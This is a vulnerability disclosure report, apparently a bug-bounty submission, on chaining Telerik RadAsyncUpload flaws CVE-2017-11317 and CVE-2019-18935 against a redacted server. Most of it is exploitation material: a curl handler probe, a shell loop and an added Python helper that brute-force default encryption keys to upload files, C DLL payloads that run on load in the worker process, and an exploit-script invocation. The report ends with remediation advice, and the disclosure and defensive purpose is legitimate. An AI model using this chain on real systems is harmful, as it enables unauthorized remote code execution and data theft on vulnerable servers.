**Description:**
https://██████/██████████/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 (arbitrary file upload through the RadAsyncUpload handler, whose upload configuration is protected only by known default encryption keys) and CVE-2019-18935 (insecure deserialization in the same handler). Chained, they allow an attacker to upload an arbitrary file and then have the server load it, gaining remote code execution on the underlying system.
## References
https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui
## Impact
An attacker can execute code on the vulnerable server in the context of the web application's worker process, gain a foothold, and exfiltrate data. Depending on the security posture of the underlying system, the attacker may also be able to escalate privileges or move laterally to other systems within the network from this access.
## System Host(s)
████
## Affected Product(s) and Version(s)
Telerik UI Version ███
## CVE Numbers
CVE-2017-11317, CVE-2019-18935
## Steps to Reproduce
## Verify the Upload Handler is Registered
First, confirm the file upload handler is registered by issuing the following request:
```bash
curl -sk https://██████████/██████████/Telerik.Web.UI.WebResource.axd?type=rau
```
You should see the following response (the misspelling "succesfully" is in Telerik's own message, so it is safe to grep for):
```
{ "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." }
```
## Version Identification
Next, install `RAU_crypto` (https://github.com/bao7uo/RAU_crypto) and use it to submit upload requests encrypted with the default keys of each known vulnerable version until one succeeds; the version whose keys the server accepts is the version it is running. After `RAU_crypto` has been installed, you can use the following script (with the attached _versions.txt_ file, one version string per line):
```bash
# Small file to upload; its content does not matter for version probing.
echo 'test' > testfile.txt
# Try each candidate version: -P <target folder> <version> <file> <url>.
# A successful upload returns JSON containing "fileInfo"; on failure the
# `|| echo` prints an empty line so the output stays one version per line.
for VERSION in $(cat versions.txt); do
echo -n "$VERSION: "
python3 RAU_crypto.py -P '█████' "$VERSION" testfile.txt https://█████████/█████/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo
done
```
This uploads a file (in this case, `testfile.txt`) to the `█████` directory on the target server. The contents of my `testfile.txt` simply included the word "test".
The script should eventually identify a vulnerable version (`████████`). The server answers a successful upload with a JSON `fileInfo` object describing the stored file (the full response also carries an encrypted `metaData` string for that upload); every other version produces no match:
```
█████████: {"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":█████ }
```
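The handler check and the version probe above can be driven from a small script instead of a shell loop. The following is an added example, not part of the original report or of `RAU_crypto`: it classifies the handler's responses, parses a successful upload response, and walks a candidate version list with a pluggable upload function. `rau_crypto_upload` assumes `RAU_crypto.py` is in the current directory and uses the same `-P` argument order as the report; the sample responses and version strings at the bottom are constructed so the helpers run offline.

```python
"""Probe helpers for the Telerik RadAsyncUpload handler (added example)."""
import json
import subprocess
from typing import Callable, Iterable, Optional, Tuple

# Exact notice Telerik returns for a reachable handler (the misspelling is Telerik's).
HANDLER_REGISTERED_MSG = "RadAsyncUpload handler is registered succesfully"


def handler_is_registered(body: str) -> bool:
    """True if a GET of Telerik.Web.UI.WebResource.axd?type=rau returned the notice."""
    return HANDLER_REGISTERED_MSG in body


def parse_upload_response(body: str) -> Optional[dict]:
    """Return the decoded JSON if `body` is a successful upload response.

    Success carries a top-level "fileInfo" object (a full response also carries
    the encrypted "metaData" string). Anything else means the version, and so
    the default key used to encrypt the request, did not match the server.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return None
    if isinstance(data, dict) and isinstance(data.get("fileInfo"), dict):
        return data
    return None


def rau_crypto_upload(version: str, file_path: str, target_dir: str, url: str) -> str:
    """Run `RAU_crypto.py -P <target folder> <version> <file> <url>` and return the
    line of its stdout that holds the server's JSON response, or "" on failure.
    Assumes RAU_crypto.py is in the working directory (not exercised offline)."""
    proc = subprocess.run(
        ["python3", "RAU_crypto.py", "-P", target_dir, version, file_path, url],
        capture_output=True, text=True, timeout=60,
    )
    for line in proc.stdout.splitlines():
        if "fileInfo" in line:
            return line.strip()
    return ""


def find_vulnerable_version(versions: Iterable[str],
                            upload: Callable[[str], str]) -> Optional[Tuple[str, dict]]:
    """Try each candidate version with `upload` (e.g. a functools.partial over
    rau_crypto_upload); return (version, parsed_response) for the first success."""
    for version in versions:
        info = parse_upload_response(upload(version))
        if info is not None:
            return version, info
    return None


# --- Constructed sample data so the helpers run offline ------------------------
REGISTERED_BODY = ('{ "message" : "RadAsyncUpload handler is registered succesfully, '
                   'however, it may not be accessed directly." }')

# Constructed responses keyed by candidate version; only one "accepts" the upload.
# The metaData value is a placeholder, not a real encrypted blob.
SAMPLE_RESPONSES = {
    "2016.2.504": "",
    "2017.1.118": ('{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html",'
                   '"ContentLength":5,"DateJson":"2020-07-02T07:01:39.540Z"},"metaData":"AAAA"}'),
    "2017.2.621": "",
}


def fake_upload(version: str) -> str:
    """Stand-in for rau_crypto_upload that answers from SAMPLE_RESPONSES."""
    return SAMPLE_RESPONSES.get(version, "")


if __name__ == "__main__":
    print("handler registered:", handler_is_registered(REGISTERED_BODY))
    print("first accepted version:", find_vulnerable_version(SAMPLE_RESPONSES, fake_upload))
```

Against a live target, replace `fake_upload` with `functools.partial(rau_crypto_upload, file_path="testfile.txt", target_dir="<folder>", url="<handler url>")` and pass the lines of _versions.txt_ as `versions`; stop at the first hit, since each further attempt leaves another uploaded file on the server.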
## Compiling a Test Payload
Now that we know we can upload a file to the target, we can attempt to exploit the deserialization vulnerability. To do this, we compile and upload a native Windows DLL, built for the same architecture as the application's worker process (x64 here, hence the `amd64` suffix below), whose `DllMain` makes the server sleep for 10 seconds before responding:
```c
#include <windows.h>
#include <stdio.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
if (fdwReason == DLL_PROCESS_ATTACH)
Sleep(10000); // Time interval in milliseconds.
return TRUE;
}
```
Because .NET loads an assembly with a given name only once per application domain, `DllMain` runs only the first time a DLL of that name is loaded; a second upload of the same file name will not sleep the server again, so give each attempt a unique name (the timestamp in the attached DLL's name serves that purpose). I have compiled and attached an unused DLL for testing purposes if desired (if not, just follow the steps from the link in the references section).
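A sleep is only observable as a latency difference, which is easy to miss behind a proxy or a slow server. The following is an added example, not the report's payload or Bishop Fox's code: the same `DllMain` entry point, but the side effect is a marker file that can be fetched or checked afterwards, which generalizes the sleep test to an unambiguous proof of execution. The marker path is an assumption (it must be a directory the worker process can write to and that you can read back); on a non-Windows build the same routine runs as a shared-object constructor so the helpers can be compiled and checked locally. Build for the target with mingw-w64, e.g. `x86_64-w64-mingw32-gcc -shared -o rau_marker_<timestamp>_amd64.dll rau_marker.c`, and remember the unique-name rule above.

```c
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Format the marker line: a fixed tag plus a timestamp, so repeated uploads
   (each under a new DLL name) leave distinguishable evidence. Returns the
   number of characters written, or -1 if it did not fit. */
static int format_marker(char *buf, size_t len, const char *tag, long long stamp)
{
    int n = snprintf(buf, len, "%s %lld\n", tag, stamp);
    return (n > 0 && (size_t)n < len) ? n : -1;
}

/* Write the marker file; returns 1 on success, 0 on any failure. */
static int write_marker(const char *path, const char *tag)
{
    char line[128];
    FILE *f;
    if (format_marker(line, sizeof line, tag, (long long)time(NULL)) < 0)
        return 0;
    f = fopen(path, "w");
    if (!f)
        return 0;
    if (fputs(line, f) == EOF) {
        fclose(f);
        return 0;
    }
    fclose(f);
    return 1;
}

/* Read the marker back; returns 1 if the first line starts with `tag`. */
static int marker_present(const char *path, const char *tag)
{
    char line[128];
    int ok;
    FILE *f = fopen(path, "r");
    if (!f)
        return 0;
    ok = fgets(line, sizeof line, f) != NULL && strncmp(line, tag, strlen(tag)) == 0;
    fclose(f);
    return ok;
}

#ifdef _WIN32
/* Assumed path: pick one the web application's worker process can write and
   you can later read (e.g. under the web root, then fetch it over HTTP). */
#define MARKER_PATH "C:\\inetpub\\wwwroot\\rau_marker.txt"

/* Runs when the deserialization gadget loads this DLL into the worker process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    (void)hinstDLL;
    (void)lpReserved;
    if (fdwReason == DLL_PROCESS_ATTACH)
        write_marker(MARKER_PATH, "RAU-RCE-TEST");
    return TRUE;
}
#else
/* Local build: the same side effect as a shared-object constructor. */
__attribute__((constructor)) static void rau_marker_ctor(void)
{
    write_marker("/tmp/rau_marker.txt", "RAU-RCE-TEST");
}

int main(void)
{
    return marker_present("/tmp/rau_marker.txt", "RAU-RCE-TEST") ? 0 : 1;
}
#endif
```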
## Exploitation
Now that we have our test payload ready, we can use the attached _CVE-2019-18935.py_ script to upload the DLL and trigger the deserialization that loads it (`-v` is the version identified above, `-f` the upload folder, `-p` the DLL):
```bash
python3 CVE-2019-18935.py -u https://███████/███/Telerik.Web.UI.WebResource.axd?type=rau -v ██████████ -f '███' -p sleep_2020070207013954_amd64.dll
```
> *Note: I'm having trouble getting the server to sleep with the crafted `.dll`. The files are getting uploaded, but do not seem to be causing the server to sleep as expected. It is 02:30 AM here at the moment so I am heading to bed but will update tomorrow with more info in the comments, and will end up self closing if I can't get execution.*
## Suggested Mitigation/Remediation Actions
Update Telerik UI for ASP.NET AJAX to a patched release: CVE-2017-11317 was addressed in R2 2017 SP1 (2017.2.621) and CVE-2019-18935 in R3 2019 SP1 (2019.3.1023), so upgrading to 2019.3.1023 or later (ideally the current release) covers both. In addition, set application-specific values for `Telerik.AsyncUpload.ConfigurationEncryptionKey` and `Telerik.Upload.ConfigurationHashKey` in web.config rather than relying on defaults, and if RadAsyncUpload is not used, disable the handler with `Telerik.AsyncUpload.DisableAsyncUploadHandler` or block `Telerik.Web.UI.WebResource.axd?type=rau` at the web server.